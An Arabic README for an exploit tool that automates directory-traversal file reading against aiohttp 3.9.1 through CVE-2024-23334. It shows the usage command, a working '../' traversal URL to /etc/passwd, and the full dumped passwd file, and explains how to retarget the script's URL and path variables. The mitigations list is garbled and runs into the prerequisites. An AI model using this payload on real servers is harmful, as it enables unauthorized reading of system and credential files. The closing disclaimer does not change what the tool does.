
نص برمجي Bash لأتمتة هجمات تضمين الملفات المحلية (LFI) على خادم aiohttp الإصدار 3.9.1.
نص برمجي بلغة Bash لأتمتة هجمات تضمين الملفات المحلية (LFI) على خوادم aiohttp الضعيفة، مع التركيز بشكل خاص على الثغرة CVE-2024-23334. يسمح هذا الاستغلال بالوصول غير المصرح به إلى الملفات التعسفية على الأنظمة التي تشغل إصدارات متأثرة من aiohttp مع مسارات ثابتة مهيأة بشكل غير صحيح.
تؤثر الثغرة CVE-2024-23334 على إطار عمل خادم/عميل HTTP غير المتزامن aiohttp الخاص بلغة Python و asyncio. تنشأ هذه الثغرة عند استخدام aiohttp كخادم ويب مع مسارات ثابتة، مما قد يؤدي إلى ثغرات اجتياز الدليل إذا تم تكوينها بشكل خاطئ. يتيح ذلك للمهاجم الوصول إلى الملفات التعسفية على النظام دون تصريح.
تتضمن الإجراءات التخفيفية لهذه الثغرة ما يلي:
follow_symlinks في تكوين الخادم.curl: تأكد من تثبيت curl على نظامك، حيث يتم استخدامه لإجراء طلبات HTTP.لتشغيل النص البرمجي، قم بتنفيذ الأمر التالي:
./lfi_aiohttp.sh -f /path/to/file/to/dump
إذا سارت الأمور على ما يرام، يجب أن ترى نتيجة مشابهة لما يلي:
[+] Curl output to the resulting url: http://localhost:8080/assets/../../..//etc/passwd.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
[+] File dumped successfully.
هام: قد تحتاج متغيرات
main_urlوpayloadفي النص البرمجي إلى التعديل اعتمادًا على البيئة المستهدفة.
main_url: يجب تعيين هذا المتغير على عنوان URL لخادم aiohttp الهدف (مثلاً http://localhost:8080). قم بتعديله وفقًا لعنوان الخادم الفعلي الذي تختبر ضده.payload: يمثل هذا المتغير مسار الملف الثابت على الخادم (مثلاً /assets/). تأكد من أن هذا المسار يطابق تكوين دليل الملفات الثابتة للخادم الهدف.قبل تشغيل النص البرمجي، راجع هذه المتغيرات للتأكد من تكوينها بشكل صحيح لسيناريو الاختبار الخاص بك. قد تؤدي الإعدادات غير الصحيحة إلى فشل محاولات الوصول إلى الملفات أو سلوك غير مقصود.
هذا النص البرمجي مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به لهذا النص البرمجي محظور وقد يكون غير قانوني.